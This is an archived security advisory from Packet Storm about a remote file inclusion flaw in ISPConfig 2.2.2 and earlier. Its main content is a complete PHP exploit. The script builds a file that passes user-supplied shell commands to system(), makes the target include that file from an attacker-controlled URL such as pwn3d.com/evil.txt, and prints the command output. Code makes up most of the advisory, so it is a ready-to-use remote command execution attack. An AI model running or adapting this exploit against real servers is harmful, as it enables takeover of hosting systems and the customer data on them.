what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ISPConfig.txt

ISPConfig.txt
Posted May 9, 2006
Authored by ReZEN | Site xorcrew.net

ISPConfig versions 2.2.2 and below suffer from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 3afa11d4e09943f0e83eb84d90ebb26e401ddc3d3d28c6ac7b0108d1353be252

ISPConfig.txt

Change Mirror Download
=======================================================================================
XOR Crew :: Security Advisory
5/6/2006
=======================================================================================
ISPConfig <= 2.2.2 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================

:: Summary

Vendor : ISPConfig
Vendor Site : http://www.ispconfig.org/
Product(s) : ISPConfig
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 5/6/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

ISPConfig is a fully-fledged solution for multi-domain Internet hosts,
covering email,
FTP, database and Web services through a nifty control panel. Throw in
security,
customer management and a billing solution, and it gets pretty attractive.

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote
command execution
in the /lib/session.inc.php file. The bug is here:

include($go_info["server"]["classes_root"] .
$go_info["server"]["dir_trenner"]
."ispconfig_template.lib.php");

the $go_info["server"]["classes_root"] variable is not set prior to
being used in the
include() function. The vendor and support team have been contacted.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php
/*
ISPConfig Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN

example:
turl:
http://www.target.com/lib/session.inc.php?go_info[server][classes_root]=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}

echo $form;

while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, my beautiful girlfriend.

!!!SP3C14L GR33TZ G03S 0UT T0 MY G00D FR13ND CIJFER!!!

!!!F*CK YOU to r0t der4444 cembo VietMafia (Pridels Sec Crew)!!!

=======================================================================================

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close